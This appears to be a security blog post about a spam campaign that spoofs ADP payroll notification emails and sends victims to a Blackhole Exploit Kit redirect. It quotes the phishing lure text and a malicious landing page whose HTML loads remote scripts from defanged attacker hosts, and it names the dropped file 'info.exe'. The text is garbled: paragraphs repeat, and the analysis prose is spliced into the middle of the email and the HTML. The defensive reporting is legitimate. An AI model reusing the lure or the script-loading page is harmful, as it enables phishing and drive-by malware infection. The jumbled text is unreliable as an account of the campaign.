Researchers at MX Lab, started to intercept a spam mail campaign that masquerade as ADP Notification mail.The mail intercepted by researchers has subjects like "ADP Funding Notification " and "ADP Security Management Update".
The email is send from the spoofed addresses ADPClientServices@adp.com, ADPClientServices@adp.com, the email address may vary.
One of the intercepted spam mail content:
BlackHole Exploit kit tries to take advantage of the vulnerability reside in the victim system. After successful exploitation, it downloads a malicious file called 'info.exe'. The detection ratio of this malware is 2/42 (VirusTotal).
The email is send from the spoofed addresses ADPClientServices@adp.com, ADPClientServices@adp.com, the email address may vary.
One of the intercepted spam mail content:
Your Transaction Report(s) have been uploaded to the web site:Once user clicks the link provided in the spam mail, he will be taken to a website which has the following script:
https://www.flexdirect.adp.com/client/login.aspx
Please note that your bank account will be debited within one banking
business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any
questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
<html>Both javascript contains same script that will redirects you to' hxxp://216.119.142.129/view.php?s=7058dba9af062ccf'. The URL hosts BlackHole Exploit Kit which use the plugin version 0.7.8 (the latest version BlackHole Exploit kit).
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://cyberku.co.cc/s8XVniQE/js.js”></script>
<script type=”text/javascript” src=”hxxp://maccvision.com/vS5qA1sz/js.js”></script>
</html>
BlackHole Exploit kit tries to take advantage of the vulnerability reside in the victim system. After successful exploitation, it downloads a malicious file called 'info.exe'. The detection ratio of this malware is 2/42 (VirusTotal).
